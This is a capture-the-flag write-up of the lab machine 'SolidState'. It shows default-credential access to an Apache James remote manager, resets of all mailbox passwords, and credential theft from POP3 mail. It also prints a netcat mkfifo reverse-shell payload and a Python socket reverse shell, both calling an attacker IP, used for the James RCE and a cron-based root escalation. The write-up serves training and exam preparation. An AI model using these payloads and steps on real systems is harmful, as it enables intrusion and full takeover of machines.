SolidState is a medium Linux box. The main objective of this box was to enumerate and exploit several things related to SMTP and POP3. In particular, an instance of James SMTP server had to be exploited. First, we were able to access the remote manager by using the default credentials. There, we were able to change the passwords of all users. Next, we used these credentials to access the users’ mails via the POP3 service. The mails contained lots of confidential data including a password and username for the SSH login. Unfortunately, we were restricted by an rbash shell. However, we were able to bypass the restricted shell by exploiting a very well known remote command execution vulnerability of the James SMTP server. To obtain the root flag, we simply exploited an existing cronjob that executed a file to which we had full read/write permissions. This way we could establish a reverse shell to the machine as user root. Overall a great box for anyone who’s preparing for the OSCP exam.
Enumeration
As always, we start by scanning the target machine’s open ports:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
rustscan --ulimit 5000 solidstate.htb -- sV -sC -oN nmap_scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp5WdwlckuF4slNUO29xOk/Yl/cnXT/p6qwezI0ye+4iRSyor8lhyAEku/yz8KJXtA+ALhL7HwYbD3hDUxDkFw90V1Omdedbk7SxUVBPK2CiDpvXq1+r5fVw26WpTCdawGKkaOMYoSWvliBsbwMLJEUwVbZ/GZ1SUEswpYkyZeiSC1qk72L6CiZ9/5za4MTZw8Cq0akT7G+mX7Qgc+5eOEGcqZt3cBtWzKjHyOZJAEUtwXAHly29KtrPUddXEIF0qJUxKXArEDvsp7OkuQ0fktXXkZuyN/GRFeu3im7uQVuDgiXFKbEfmoQAsvLrR8YiKFUG6QBdI9awwmTkLFbS1Z
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBISyhm1hXZNQl3cslogs5LKqgWEozfjs3S3aPy4k3riFb6UYu6Q1QsxIEOGBSPAWEkevVz1msTrRRyvHPiUQ+eE=
| 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKbFbK3MJqjMh9oEw/2OVe0isA7e3ruHz5fhUP4cVgY
25/tcp open smtp? syn-ack
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http syn-ack Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
110/tcp open pop3? syn-ack
119/tcp open nntp? syn-ack
4555/tcp open rsip? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
According to the port scan the machine has several open ports. The most interesting ones are the following:
- Port 22 - OpenSSH 7.4p1 Debian
- Port 25 - SMTP
- Port 80 - Apache httpd 2.4.25
- Port 110 - pop3
Enumeration Port 25 - SMTP
For the enumeration of the SMTP server, we start with some simple things like grabbing the SMTP server’s banner. This can be done by simply connecting to the service via nc or telnet.
1
2
3
4
┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ nc -vn 10.129.29.189 25
(UNKNOWN) [10.129.29.189] 25 (smtp) open
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Fri, 24 Jun 2022 08:49:30 -0400 (EDT)
Here, we immediately get the server version. Apparently it’s JAMES SMTP Server 2.3.2. This also gives us information about the other ports, as JAMES also comes with POP3 (Port 110), NNTP (Port 119) and the James Remote Manager (Port 4555). However, what’s more interesting is that this particular version of the James SMTP server is well known for a Remote Command Execution.
James SMTP Server 2.3.2 - Remote Command Execution
“Apache James 2.3.2 is an email server containing a vulnerability that allows an attacker to execute arbitrary commands on the machine running the server. The vulnerability arises from an insecure default configuration and a lack of input validation in the server’s user creation mechanism; it allows an attacker to enqueue commands to execute when a user signs into the machine. Despite the vulnerability, a number of techniques can be employed to reduce the machine’s attack surface and mitigate the risk of a compromise.” Source
Searchsploit also provides us several working exploits for that vulnerability:
The problem is: the exploit requires another user to log in…. So we first have to find some user credenitals. Maybe there are some confidenital mails that we can access through the SMTP server.
Finding credentials
A great utility is the Remote Manager on Port 4555. It’s a common issue that the default credentials root:root usually work. Also in this case, they work and we get access to the remote manager of the James SMTP server.
Here, we can now check for existing users:
1
2
3
4
5
6
7
8
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Great! Now let’s change the password of each user so that we can successfully authenticate ourself at the POP3 server.
1
2
3
4
5
6
7
8
9
10
setpassword james 1234
Password for james reset
setpassword thomas 1234
Password for thomas reset
setpassword john 1234
Password for john reset
setpassword mindy 1234
Password for mindy reset
setpassword mailadmin 1234
Password for mailadmin reset
Next step is to connect to the POP3 server (that’s the MAIL RECEIVER) to list the mails of the found users (having some issues with nc so I switched to telnet):
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER james
+OK
PASS 1234
+OK Welcome james
LIST
+OK 0 0
Hmm no mails for the user james. Let’s move on to the user thomas. But, he also has no mails in his mailbox….
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER thomas
+OK
PASS 1234
+OK Welcome thomas
LIST
+OK 0 0
.
^]
Let’s proceed with john: Finally we get some more information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS 1234
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
The mail talks about a temporary password for the user mindy. That’s exactly what we are looking for! Let’s inspect mindy's mailbox.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/HTB/machines/solidstate]
└─$ telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS 1234
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
We see 2 mails in her mailbox.
Mail 1
Just some information about the onboarding … not something that’s particularly helpful for us.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
Mail 2
That’s what we’ve been looking for! Credentials for the user mindy: mindy:P@55W0rd1!2@.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
Initial Foothold
Now that we have valid credentials for the user mindy, we can try to log in to the system via SSH.
And it works! There is just one major problem: this is not a proper shell but rbash. This means we are highly restricted in the available commands that we can execute. We cannot even change directory.
But remember the Remote Command Execution vulnerability of the JAMES SMTP server? We can now exploit that vulnerability as we can simulate the user login! This way, we can establish a proper reverse shell (with full permissions) as user mindy. As this is a very well known exploit, I won’t go into much details here. However, if you still want details on how the exploit works, this article explains it step by step.
Anyway. In this case, we simply use the 35513.py script and adjust the payload as follows:
1
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.43 4444 >/tmp/f'
When exeucting the script, it will overwrite the /etc/bashcompletion./d file. Once a user logs in (we do that manually as user mindy), it will execute the provided payload (in this case a reverse shell).
There we, we just bypassed the rbash restriction!
Privilege Escalation
We can now start with the enumeration of the system. First, we upload a copy of linpeas.sh to the system. Then, we give it execute permissions and run the script.
The output gives us a decent overview of the system:
1) We see that root runs some cronjobs.
1
root 510 0.0 0.5 5264 2864 ? Ss 07:25 0:00 /usr/sbin/cron -f
2) There is a file called /opt/tmp.py to which we have full permissions
1
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
That’s the code which is stored in the tmp.py file:
1
2
3
4
5
6
7
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
That’s interesting! I’ve already been wondering why my linpeas.sh disappeared. My current guess is, that this file is somehow involed in the cronjob that’s being executed by root. Let’s use PSpy to verify that assumption.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Apparently my assumption was correct! Every 3 minutes we get the following output: Root simply executes the tmp.py file.
1
2
3
4
2022/06/24 11:06:01 CMD: UID=0 PID=6512 | /usr/sbin/CRON -f
2022/06/24 11:06:01 CMD: UID=0 PID=6513 | /usr/sbin/CRON -f
2022/06/24 11:06:01 CMD: UID=0 PID=6514 | /bin/sh -c python /opt/tmp.py
2022/06/24 11:06:01 CMD: UID=0 PID=6515 | python /opt/tmp.py
To gain root access, we simply have to change the code of the python file. Easy as that:
1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Now we just have to wait another 3 minutes until the cronjob executes the modified file and establishes a reverse shell to our attacker machine.
